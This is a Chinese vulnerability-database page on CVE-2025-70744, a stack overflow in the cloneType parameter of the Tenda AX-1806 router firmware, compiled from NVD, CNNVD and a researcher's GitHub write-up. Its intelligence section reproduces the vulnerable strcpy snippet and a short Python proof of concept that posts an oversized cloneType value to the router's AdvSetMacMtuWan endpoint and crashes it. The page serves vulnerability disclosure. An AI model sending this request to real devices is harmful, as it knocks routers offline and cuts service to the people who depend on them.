支持本站 — 捐款将帮助我们持续运营

目标:1000 元,已筹:736

73.6%
一、 漏洞 CVE-2025-70744 基础信息
漏洞信息
                                        # N/A

## 概述
Tenda AX-1806 v1.0.0.1 中发现存在栈溢出漏洞,位于 `sub_65B5C` 函数的 `cloneType` 参数处理过程中。

## 影响版本
Tenda AX-1806 v1.0.0.1

## 细节
漏洞存在于 `sub_65B5C` 函数中,对 `cloneType` 参数缺乏有效边界检查,导致栈溢出。

## 影响
攻击者可通过构造恶意请求触发栈溢出,造成拒绝服务(DoS)。
                                        
神龙判断

是否为 Web 类漏洞: 未知

判断理由:

N/A
提示
尽管我们采用了先进的大模型技术,但其输出仍可能包含不准确或过时的信息。
神龙会尽力确保数据准确,但也请结合实际情况进行甄别与判断。
神龙祝您一切顺利!
漏洞标题
N/A
来源:美国国家漏洞数据库 NVD
漏洞描述信息
Tenda AX-1806 v1.0.0.1 was discovered to contain a stack overflow in the cloneType parameter of the sub_65B5C function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request.
来源:美国国家漏洞数据库 NVD
CVSS信息
N/A
来源:美国国家漏洞数据库 NVD
漏洞类别
N/A
来源:美国国家漏洞数据库 NVD
漏洞标题
Tenda AX1806 安全漏洞
来源:中国国家信息安全漏洞库 CNNVD
漏洞描述信息
Tenda AX1806是中国腾达(Tenda)公司的一个 WiFi6 无线路由器。 Tenda AX1806 v1.0.0.1版本存在安全漏洞,该漏洞源于sub_65B5C函数的cloneType参数存在栈溢出,可能导致通过特制请求造成拒绝服务。
来源:中国国家信息安全漏洞库 CNNVD
CVSS信息
N/A
来源:中国国家信息安全漏洞库 CNNVD
漏洞类别
其他
来源:中国国家信息安全漏洞库 CNNVD
二、漏洞 CVE-2025-70744 的公开POC
#POC 描述源链接神龙链接
三、漏洞 CVE-2025-70744 的情报信息
  • 标题: VulnbyCola/Tenda/AX-1806/10/1.md at main · 0-fool/VulnbyCola · GitHub -- 🔗来源链接

    标签:

    神龙速读:
                                            ### 关键信息摘要
    
    - **厂商**: Tenda
    - **产品**: AX-1806
    - **版本**: v1.0.0.1
      - [下载链接](https://www.tenda.com.cn/download/detail-3421.html)
    - **漏洞类型**: 栈溢出
    - **作者**: Shuhao Shen
    - **电子邮件**: shenshuhao@hust.edu.cn
    - **机构**: 华中科技大学 (HUST)
    
    #### 漏洞原因
    
    在函数 `sub_65B5C` 中,`cloneType` 值是从用户控制的输入中获取的,并复制到本地缓冲区 `v12`。`v12` 是一个固定大小的栈缓冲区(32 字节的 `char v12[32]`),而 `strcpy` 不对源字符串进行界限检查。当用户提供的 `cloneType` 参数值过长时,会导致缓冲区溢出,覆盖相邻的栈内存,从而可能引发程序崩溃或服务不可用。
    
    #### 代码片段
    
    ```cpp
    v4 = (const char *)sub_295C8(a1, "cloneType", "0");
    strcpy(v12, v4);
    ```
    
    #### PoC 攻击示例
    
    使用以下 Python 脚本攻击:
    
    ```python
    import requests
    
    url = "http://192.168.20.12/goform/AdvSetMacMtuWan"
    
    cloneType = "A"*7000
    data = {
        "cloneType": cloneType
    }
    
    r = requests.post(url, data=data)
    print(r.status_code, r.text)
    ```
    
    #### 结果
    
    攻击后,目标路由器崩溃,无法正确提供服务。
                                            
    VulnbyCola/Tenda/AX-1806/10/1.md at main · 0-fool/VulnbyCola · GitHub
  • https://nvd.nist.gov/vuln/detail/CVE-2025-70744
四、漏洞 CVE-2025-70744 的评论

暂无评论


发表评论